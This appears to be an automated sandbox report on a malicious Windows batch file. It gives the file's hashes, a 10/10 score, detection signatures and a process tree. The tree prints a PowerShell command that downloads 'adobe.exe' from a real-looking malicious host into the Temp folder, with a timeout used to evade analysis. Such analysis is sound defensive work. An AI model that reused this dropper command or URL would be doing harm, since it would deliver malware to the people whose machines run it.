Overview

overview

10

Static

static

1

f282ea180c...41.bat

windows7-x64

10

f282ea180c...41.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    18/09/2024, 01:46

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat

  • Size

    981B

  • MD5

    55441f54cefe60f02b21640c5dbe9302

  • SHA1

    e1c37e59d06151d02965bce54a39737e3ccd8520

  • SHA256

    f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941

  • SHA512

    6f6c7ccaf694ae01a0b3feead5a715f1a2f3b3f0516d0dd63e81e90b22d0629b2c7f1c33b9a434fe0f652559d1bd65e8c7728307895094ed7b7038c7398b9ef3

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bulletenergyllc.homes/deejay/adobe.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\system32\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\f282ea180ce6d32f11b086780ae1425336aebad1d0a98170f19f629703ddb941.bat min
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "try { (New-Object System.Net.WebClient).DownloadFile('http://bulletenergyllc.homes/deejay/adobe.exe', 'C:\Users\Admin\AppData\Local\Temp\dee.exe') } catch { Write-Host 'Error downloading file: ' $_.Exception.Message }"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2756
      • C:\Windows\system32\timeout.exe
        timeout /t 60 /nobreak
        3⤵
        • Delays execution with timeout.exe
        PID:2008

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2756-4-0x000007FEF5F0E000-0x000007FEF5F0F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2756-5-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2756-6-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2756-7-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2756-8-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2756-9-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2756-10-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2756-11-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2756-12-0x000007FEF5F0E000-0x000007FEF5F0F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2756-15-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

    Download